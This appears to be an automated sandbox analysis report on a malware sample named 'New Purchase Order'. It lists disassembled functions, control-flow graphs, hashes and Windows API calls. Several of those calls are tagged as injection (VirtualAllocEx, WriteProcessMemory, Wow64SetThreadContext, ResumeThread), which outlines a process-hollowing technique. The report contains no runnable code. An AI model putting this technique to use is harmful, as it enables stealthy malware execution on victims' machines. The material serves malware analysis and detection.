                          control_flow_graph 686 c8ada8-c8adb7 687 c8adb9-c8adc6 call c8a0cc 686->687 688 c8ade3-c8ade7 686->688 693 c8adc8 687->693 694 c8addc 687->694 689 c8ade9-c8adf3 688->689 690 c8adfb-c8ae3c 688->690 689->690 697 c8ae49-c8ae57 690->697 698 c8ae3e-c8ae46 690->698 743 c8adce call c8b040 693->743 744 c8adce call c8b031 693->744 694->688 700 c8ae59-c8ae5e 697->700 701 c8ae7b-c8ae7d 697->701 698->697 699 c8add4-c8add6 699->694 703 c8af18-c8af94 699->703 704 c8ae69 700->704 705 c8ae60-c8ae67 call c8a0d8 700->705 702 c8ae80-c8ae87 701->702 707 c8ae89-c8ae91 702->707 708 c8ae94-c8ae9b 702->708 736 c8afc0-c8afd8 703->736 737 c8af96-c8afbe 703->737 709 c8ae6b-c8ae79 704->709 705->709 707->708 711 c8aea8-c8aeaa call c8a0e8 708->711 712 c8ae9d-c8aea5 708->712 709->702 716 c8aeaf-c8aeb1 711->716 712->711 717 c8aebe-c8aec3 716->717 718 c8aeb3-c8aebb 716->718 720 c8aee1-c8aeee 717->720 721 c8aec5-c8aecc 717->721 718->717 726 c8aef0-c8af0e 720->726 727 c8af11-c8af17 720->727 721->720 722 c8aece-c8aede call c8a0f8 call c8a108 721->722 722->720 726->727 738 c8afda-c8afdd 736->738 739 c8afe0-c8b00b GetModuleHandleW 736->739 737->736 738->739 740 c8b00d-c8b013 739->740 741 c8b014-c8b028 739->741 740->741 743->699 744->699
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00C8AFFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 7861fa10b47984a00c3f8aae7683031b950c924c28f6e1c121208470fb62ca2e
                          • Instruction ID: 5fe4d7c45436ea3305271e74dac62db71b6c7771c083e6ab0541586f6ff5cdc0
                          • Opcode Fuzzy Hash: 7861fa10b47984a00c3f8aae7683031b950c924c28f6e1c121208470fb62ca2e
                          • Instruction Fuzzy Hash: F4816870A00B458FE724EF29C44179ABBF1FF88308F00892ED096DBA50D775E95ACB95
                          Function 00C8590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 745 c8590c-c859d9 CreateActCtxA 747 c859db-c859e1 745->747 748 c859e2-c85a3c 745->748 747->748 755 c85a4b-c85a4f 748->755 756 c85a3e-c85a41 748->756 757 c85a60 755->757 758 c85a51-c85a5d 755->758 756->755 760 c85a61 757->760 758->757 760->760
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 00C859C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: e86fef07727146031bc7ac1a0e2243f4bb0a75d25f7265cab0dae36abf0d6c92
                          • Instruction ID: 9e8c37421221184abbcd26c2d31d889ea9c28b6b246e80967b8f0148249af005
                          • Opcode Fuzzy Hash: e86fef07727146031bc7ac1a0e2243f4bb0a75d25f7265cab0dae36abf0d6c92
                          • Instruction Fuzzy Hash: 5841E2B0C00619CFDB24DFA9C8847DEBBF6BF49308F24815AD408AB255DBB55946CF90
                          Function 00C844C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 761 c844c4-c859d9 CreateActCtxA 764 c859db-c859e1 761->764 765 c859e2-c85a3c 761->765 764->765 772 c85a4b-c85a4f 765->772 773 c85a3e-c85a41 765->773 774 c85a60 772->774 775 c85a51-c85a5d 772->775 773->772 777 c85a61 774->777 775->774 777->777
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 00C859C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: f2af371eaf7f4de8ff3c3359b4a37e914cc6aec9a34987738f87d37c734515ed
                          • Instruction ID: e8c10a9f795879bdf69f815c6f220b174553f39b024b91975caa9d60b0ec1379
                          • Opcode Fuzzy Hash: f2af371eaf7f4de8ff3c3359b4a37e914cc6aec9a34987738f87d37c734515ed
                          • Instruction Fuzzy Hash: 8641C2B0C0071DCBDB24DFA9C8847DEBBB6BF48704F24816AD408AB255DBB55946CF94
                          Function 06F4CA49 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 778 6f4ca49-6f4ca50 779 6f4ca77-6f4ca78 778->779 780 6f4ca52-6f4ca5b 778->780 782 6f4ca79-6f4ca7a 779->782 783 6f4c9fa-6f4ca22 PostMessageW 779->783 781 6f4ca5c-6f4ca76 780->781 781->779 782->781 786 6f4ca7c-6f4ca7d 782->786 784 6f4ca24-6f4ca2a 783->784 785 6f4ca2b-6f4ca3f 783->785 784->785 787 6f4ca84-6f4ca97 786->787 788 6f4ca7f-6f4ca81 786->788 792 6f4caa8-6f4cac3 787->792 793 6f4ca99-6f4caa6 787->793 788->787 796 6f4cac5 792->796 797 6f4cacd 792->797 793->792 796->797
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 27e757659f7ad5262188d34aa7bf0eb69f2759b979227158cc370b2b32f8a7ab
                          • Instruction ID: 85773f13acdf03b24bdaaf080b9c1a2e7130e1bee5b95f0889d26681a0c6cb0e
                          • Opcode Fuzzy Hash: 27e757659f7ad5262188d34aa7bf0eb69f2759b979227158cc370b2b32f8a7ab
                          • Instruction Fuzzy Hash: 87210F72D062199FDB20EFA5E8257EEBFF5AF88310F14841AD445B7A81C77A5844CBE0
                          Function 06F48030 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 798 6f48030-6f48086 801 6f48096-6f480d5 WriteProcessMemory 798->801 802 6f48088-6f48094 798->802 804 6f480d7-6f480dd 801->804 805 6f480de-6f4810e 801->805 802->801 804->805
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F480C8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: ebeffa8fc94fb6f93e6ee92f8976ad5b4879ff7b4d861a6fc485ff4cdc4f8088
                          • Instruction ID: a6ce157ade072fbd000d504cb1f439bf7fc7d8f36a5c2364c4dad33182ec3d0a
                          • Opcode Fuzzy Hash: ebeffa8fc94fb6f93e6ee92f8976ad5b4879ff7b4d861a6fc485ff4cdc4f8088
                          • Instruction Fuzzy Hash: A02135B1D003599FCB10DFA9C885BDEBBF5FF48310F10842AE959A7250C778A944CBA4
                          Function 06F48038 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F480C8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: b4787267a73ff0740dd0d0bec6866f86d9e8a0be19499194502f49ddc7b2ae81
                          • Instruction ID: b9c8c1f296405e6468a2032cc56728c85229927ac14da50f583b851f75ebc047
                          • Opcode Fuzzy Hash: b4787267a73ff0740dd0d0bec6866f86d9e8a0be19499194502f49ddc7b2ae81
                          • Instruction Fuzzy Hash: AB2126B1D003599FCB10DFA9C885BDEBBF5FF48310F108429E959A7250C7789954CBA4
                          Function 06F48120 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F481A8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 27f87fb7d357e965f695bf702da4cb23f8bec082f4f3edb161cfcdc5ebee7e19
                          • Instruction ID: eda4c00af175fd0ae44c084c8811008078d76d79ac0fcdc9b24c8ea71e69ae14
                          • Opcode Fuzzy Hash: 27f87fb7d357e965f695bf702da4cb23f8bec082f4f3edb161cfcdc5ebee7e19
                          • Instruction Fuzzy Hash: 462116B1D003599FCB10DFAAC885ADEFBF5FF88320F10842AE559A7250C7359944CBA5
                          Function 06F47A60 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F47AE6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 0e566d78ca768c427a90a8fbdb3dd07f997b7e051c9c979c2f61c3415f7c09fb
                          • Instruction ID: 70d3ecad309237136ebe462e55f51dc76b5edeba3850ad1f84f7a3c6c59952d8
                          • Opcode Fuzzy Hash: 0e566d78ca768c427a90a8fbdb3dd07f997b7e051c9c979c2f61c3415f7c09fb
                          • Instruction Fuzzy Hash: 7A215971D002099FCB10DFAAC4857EEBFF5EF88324F148429D459A7251CB789945CFA5
                          Function 00C8D689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C8D717
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 1b717b38d5f9b9777d2b77cf1d0b58e860a747da4f6585877b0dafef7d19d8ae
                          • Instruction ID: 335d03b0f1b3d5dc72a975ed74b15cbbe32eb710d0e00b808c5e2dda0baad717
                          • Opcode Fuzzy Hash: 1b717b38d5f9b9777d2b77cf1d0b58e860a747da4f6585877b0dafef7d19d8ae
                          • Instruction Fuzzy Hash: D32116B5900258DFDB10CFA9D484ADEFFF5EB48324F14801AE855A3350C374A941CF64
                          Function 06F48128 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F481A8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 0841aaf792c4104b24611b831f22892054653efb4750cadb4b1ba7b703e29e4d
                          • Instruction ID: 1d6154efcfd18cd78ccd86762169ee0d14d93879c87f341b3f33e9b12540eacb
                          • Opcode Fuzzy Hash: 0841aaf792c4104b24611b831f22892054653efb4750cadb4b1ba7b703e29e4d
                          • Instruction Fuzzy Hash: CE2128B1C003599FCB10DFAAC884ADEFBF5FF88320F10842AE558A7250C7349544CBA4
                          Function 06F47A68 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F47AE6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 176b330c14aac454fe7a3e10f4ee8c257dda795e0e8550ed84590a2ab6f15fb2
                          • Instruction ID: 596f841b33a670646d53c5eb6cf4981591a69a0d62067d49c1561e7cb566d870
                          • Opcode Fuzzy Hash: 176b330c14aac454fe7a3e10f4ee8c257dda795e0e8550ed84590a2ab6f15fb2
                          • Instruction Fuzzy Hash: 042137B1D002098FDB10EFAAC4857EEBBF5AF88324F148429D459A7250CB789944CFA5
                          Function 00C8B031 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00C8AFFE
                            • Part of subcall function 00C8A130: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C8B079,00000800,00000000,00000000), ref: 00C8B28A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: HandleLibraryLoadModule
                          • String ID:
                          • API String ID: 4133054770-0
                          • Opcode ID: 3c7139da135be13f27ef8f289ece29d6cd85867a33ac1571ddcb0dbc1c98fd75
                          • Instruction ID: e40a10cd0d1a123864c93b7f0bd8ac37c1ef5ed037f31003e9d951d91f3f21a5
                          • Opcode Fuzzy Hash: 3c7139da135be13f27ef8f289ece29d6cd85867a33ac1571ddcb0dbc1c98fd75
                          • Instruction Fuzzy Hash: 8B1104B1A003048FEB10EF6AD84079BBBF5AFC5318F14846AD019DB251CB759D05CFA5
                          Function 00C8D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C8D717
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 9932730d8deef7c12df316c68215556b5bc189cd42780199a626acd32873aba4
                          • Instruction ID: 477d58dc99ba6c9c86ea06fe0cf10a3996d585e1405e22d257ee19cd3d3bdc5c
                          • Opcode Fuzzy Hash: 9932730d8deef7c12df316c68215556b5bc189cd42780199a626acd32873aba4
                          • Instruction Fuzzy Hash: 2121E4B5900248DFDB10CF9AD984ADEFBF5EB48324F14801AE915A3350C374A950CFA4
                          Function 06F47F71 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F47FE6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: f2f3b6dcf8b2e339003636573a2156189e9e69ae00898c5cc478faa184c2b76b
                          • Instruction ID: dcba68a83df6f7e4e5d2c77f23b0c3731bfadc0d4b604c0c841f757a37374050
                          • Opcode Fuzzy Hash: f2f3b6dcf8b2e339003636573a2156189e9e69ae00898c5cc478faa184c2b76b
                          • Instruction Fuzzy Hash: 471156729002499FCB10EFAAC845BDFBFF5EB88320F148419E519A7250CB35A554CFA4
                          Function 00C8A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C8B079,00000800,00000000,00000000), ref: 00C8B28A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: b7055784bee3539d25c7922412c81f7c4f64af49a3ed983d6383276b9ba9e91a
                          • Instruction ID: dec258b80b7e0b5aa256ef3617473f2f65ee54af98af4c2eb882453aface4894
                          • Opcode Fuzzy Hash: b7055784bee3539d25c7922412c81f7c4f64af49a3ed983d6383276b9ba9e91a
                          • Instruction Fuzzy Hash: 021126B69003099FCB10DF9AC444ADEFBF4EB88724F10842ED419A7210C375A945CFA8
                          Function 00C8B218 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C8B079,00000800,00000000,00000000), ref: 00C8B28A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 7d1ad93b460c95af3a942d8b9af5821a9ad0dad7a04ab69a64e9f23156270875
                          • Instruction ID: cc4b67c7e052364a12aba663b4fcb82f81b6bede230dcc1c4c33f0eeba1c0c0d
                          • Opcode Fuzzy Hash: 7d1ad93b460c95af3a942d8b9af5821a9ad0dad7a04ab69a64e9f23156270875
                          • Instruction Fuzzy Hash: D61114B6D002498FCB10DFAAC444ADEFBF4EB49324F14842ED469A7210C375A945CFA5
                          Function 06F47F78 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F47FE6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 9d40947c95b8426c7e68105d9a78bee82ba7fb9ab6c9c888affc5964ac1d0550
                          • Instruction ID: 5dd59cebbeb34731a404bf293f56bd446240766d8cf8e50d29c358d46a7aaa1e
                          • Opcode Fuzzy Hash: 9d40947c95b8426c7e68105d9a78bee82ba7fb9ab6c9c888affc5964ac1d0550
                          • Instruction Fuzzy Hash: 3A1126719002499FCB10EFAAC844ADFBFF5EB88324F148419E559A7250CB75A554CFA4
                          Function 06F47579 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: e83b3a076c6ccc753318a70d92c4b804e7b8718372ade071e5af716fb1ea41b3
                          • Instruction ID: d13dbab84992ec698c25abd2d866828e5352723e5895680d51af73069bd1a87d
                          • Opcode Fuzzy Hash: e83b3a076c6ccc753318a70d92c4b804e7b8718372ade071e5af716fb1ea41b3
                          • Instruction Fuzzy Hash: 601128B1D002498FDB20EFAAC8457DFFBF5EB88324F248419D459A7250CB75A544CFA5
                          Function 06F47580 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 3f8e42cc39dc5ab7f76a597fc51e4f6306727c8d73880e0b21cf2afaccfd56d6
                          • Instruction ID: 5677995c73018597ce6861b2f95af7d23c67495c1ee42dfef9cfa3bbd563ff58
                          • Opcode Fuzzy Hash: 3f8e42cc39dc5ab7f76a597fc51e4f6306727c8d73880e0b21cf2afaccfd56d6
                          • Instruction Fuzzy Hash: 2D1128B1D002498BCB10DFAAC4457DEFBF5AB88324F248419D459A7250CB75A544CFA4
                          Function 06F4C334 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F4CA15
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 987048a5cc248c753abc7a2fa7cf718490c4e31f2bfad78b4e2440a171842d66
                          • Instruction ID: 0d93d51ec07f177efe331e2f2b39cc0d112675b0864495a8fe3ab4d1d968131f
                          • Opcode Fuzzy Hash: 987048a5cc248c753abc7a2fa7cf718490c4e31f2bfad78b4e2440a171842d66
                          • Instruction Fuzzy Hash: AE1110B58003489FCB10DF8AC844BDEBFF8EB48724F10841AE958A7610C375A944CFA0
                          Function 06F4C9B0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F4CA15
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 5ab73187412df5d32f5568f683e1237369fe192cc7ae9886e17bdae2ff04e5aa
                          • Instruction ID: 5dd40569185590680d038f17a56316b469cb0b6dea57a39b3f1d66bca48b60e5
                          • Opcode Fuzzy Hash: 5ab73187412df5d32f5568f683e1237369fe192cc7ae9886e17bdae2ff04e5aa
                          • Instruction Fuzzy Hash: E211F2B58003499FCB10DF9AD849BDEBFF8EB48324F208459E558A7610C379A984CFA5
                          Function 00C8AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00C8AFFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: a0459d0eaa515edcb788a38a3a683c3d2bb08cb2b46e1957a8bd5561754a98b0
                          • Instruction ID: d032e0906f15043cda8b5d4c541e1dc53e4b9cc4363b3b5c154ded1831f972a6
                          • Opcode Fuzzy Hash: a0459d0eaa515edcb788a38a3a683c3d2bb08cb2b46e1957a8bd5561754a98b0
                          • Instruction Fuzzy Hash: 5B110FB5C002498FCB10DF9AC444ADEFBF4AB88328F10842AD429A7210C379A945CFA5
                          Function 00C1D1FC Relevance: .1, Instructions: 76COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693395207.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c1d000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96357e0fc9ac85cb9aaac9c2f3e4fb0ef4ff9d153171fe41ad53609ca1f5d198
                          • Instruction ID: 471c83236bef67703f8c13b20dbc475e899ad7f491d02dc2817c3cb0814cfc2c
                          • Opcode Fuzzy Hash: 96357e0fc9ac85cb9aaac9c2f3e4fb0ef4ff9d153171fe41ad53609ca1f5d198
                          • Instruction Fuzzy Hash: 28210371504200DFCB05DF14D9C4B6ABFA5FB89310F20C6A9ED1A0B256C336DC96EBA1
                          Function 00C3D01C Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693458668.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c3d000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 07cc4578831b1438d5a89b1aae7dab208343f67bf66ca2eee403d86421471c0a
                          • Instruction ID: f83849c2cb15b2bf076dfb5a17411351dfd1b06038082e14ebfe0a5276c0f882
                          • Opcode Fuzzy Hash: 07cc4578831b1438d5a89b1aae7dab208343f67bf66ca2eee403d86421471c0a
                          • Instruction Fuzzy Hash: 84210471614200DFCB18DF24E9C4B26BFA5FB84B14F20C56DE84A4B296C33AD847CA61
                          Function 00C3D005 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693458668.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c3d000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08282dfcc1f5e78612cd9bbf8033ab925dbc528ce171892140d3ac971987bc3c
                          • Instruction ID: c56e87f18b3e4db2993e18518472f903f43b6675b140fa9422c0b0a4fadd530b
                          • Opcode Fuzzy Hash: 08282dfcc1f5e78612cd9bbf8033ab925dbc528ce171892140d3ac971987bc3c
                          • Instruction Fuzzy Hash: F4218E755093808FCB06CF24D994B15BF71EB46314F28C5EAD8498F2A7C33A980ACB62
                          Function 00C1D1F7 Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693395207.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c1d000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                          • Instruction ID: 8e1e3e522292dd89262426c07bb77576d413e9931da5e782c67b938e984c8473
                          • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                          • Instruction Fuzzy Hash: 8521E176404240CFCB06CF00D9C4B56BF72FB85314F24C2A9DC190B656C33AD96ADBA1
                          Function 00C1D731 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693395207.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c1d000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: de809090532893d80f3c5e2950f49a937d82787b138f231ab9705e2583ec2a62
                          • Instruction ID: 03dc952d8c08561087f6b1730bd308b1d67a471445625fc1b3a39c998272293e
                          • Opcode Fuzzy Hash: de809090532893d80f3c5e2950f49a937d82787b138f231ab9705e2583ec2a62
